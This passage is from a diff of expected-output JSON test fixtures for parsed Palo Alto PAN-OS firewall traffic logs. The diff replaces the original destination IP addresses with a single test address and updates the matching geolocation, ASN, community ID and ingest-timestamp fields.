6 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "panw": { "panos": { "ruleset": "rule1", @@ -2180,7 +2176,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:rpU2pqp4ioYKgiuDEfjZitnLkow=", + "community_id": "1:f7Ng4EbjzMyrFro3SgGMhIUPtms=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -2218,14 +2214,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.283936100Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "ingested": "2021-12-09T13:43:22.381722300Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -2248,27 +2244,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 551, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 3 }, "rule": { @@ -2287,7 +2282,7 @@ }, "packets": 18 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", "panw": { "panos": { "ruleset": "rule1", @@ -2321,7 +2316,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:JuKJfhPs1pDZMiwy04nz1EsD7PA=", + "community_id": "1:OvxXAeJmXE3c0IiRCKr2+Z4qk7Y=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -2359,14 +2354,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 512000000000, - "ingested": "2021-09-08T12:38:09.283941201Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", + "ingested": "2021-12-09T13:43:22.381727900Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -2389,27 +2384,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -2428,7 +2422,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -2462,7 +2456,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:bZl1JgwyPgfsbSrD+z8I/hpbdc4=", + "community_id": "1:3be4rO6jMOmXDKYhNViDYESR4pg=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -2500,14 +2494,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283950381Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381733300Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -2530,27 +2524,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -2569,7 +2562,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -2603,7 +2596,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:0fIOSC1t62T9ExNKvZaxl657EVc=", + "community_id": "1:lB9VWdNEHqna/swiak+4X1dqv1k=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -2641,14 +2634,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283956883Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381738800Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -2671,24 +2664,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -2707,7 +2702,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -2741,7 +2736,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:vFErz1cKNExckY21peQ3YAc8Tmk=", + "community_id": "1:PMRrLCOB2StOtC/z2Ryc3xs4yys=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -2779,14 +2774,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283961584Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381744Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -2809,24 +2804,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -2845,7 +2842,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -2879,7 +2876,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:i4rdWjY94ZjxNIBve+QH3YwdL04=", + "community_id": "1:D/AITIdbtDhbzJ7TPkD8tJEDQL8=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -2917,14 +2914,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283966100Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381749300Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -2947,27 +2944,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -2986,7 +2982,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -3020,7 +3016,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:mY2EPMYo0US42k87/2uTzjo/rGA=", + "community_id": "1:CpnxxiYk2GolQXL1AiyOIq2jeIE=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -3058,14 +3054,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283970635Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381754600Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -3088,24 +3084,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 98, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -3124,7 +3122,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "panw": { "panos": { "ruleset": "rule1", @@ -3158,7 +3156,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:GjCL7PEzM4X3r7frQ42mW+tNEIQ=", + "community_id": "1:uZGf14yGXLuVqgxNn/x0hlWgh4g=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -3196,14 +3194,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283979716Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "ingested": "2021-12-09T13:43:22.381760Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -3226,27 +3224,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 806, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 4 }, "rule": { @@ -3265,7 +3262,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "panw": { "panos": { "ruleset": "rule1", @@ -3299,7 +3296,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2+g5+FYJDJku+1Cl3ZbhVCYdAog=", + "community_id": "1:PD0hioBJ+IzajuBqLSHPUBrCofM=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -3337,14 +3334,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283985805Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "ingested": "2021-12-09T13:43:22.381765600Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -3367,27 +3364,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 806, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 4 }, "rule": { @@ -3406,7 +3402,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "panw": { "panos": { "ruleset": "rule1", @@ -3440,7 +3436,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:+ENVPObTW4uBLTLg/Gs7oB3/t0E=", + "community_id": "1:mENVk+bt4rLWFKRUfRfPQ6qnUkc=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -3478,14 +3474,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283990427Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", + "ingested": "2021-12-09T13:43:22.381768800Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 